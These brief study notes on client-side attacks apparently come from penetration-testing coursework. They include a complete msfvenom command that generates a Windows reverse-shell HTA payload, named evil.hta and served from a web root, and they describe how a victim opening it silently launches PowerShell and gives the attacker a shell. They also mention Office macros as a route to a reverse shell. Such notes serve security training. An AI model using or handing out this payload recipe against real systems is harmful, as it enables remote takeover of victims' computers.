Client-Side Attacks
Require client interaction for client software to execute malicious code.
Know Your Target
Passive Client Information Gathering
HTA Attack
Generate html file
sudo msfvenom -p windows/shell_reverse_tcp LHOST=<hacker ip> LPORT=<PORT> -f hta-psh -o /var/www/html/evil.hta
When client open this html and click allow, powershell on victim's machine is launched silently and a reverse shell will be sent back to attacker.
Exploiting Microsoft Office
Use macro to execute powershell code to create a rever shell.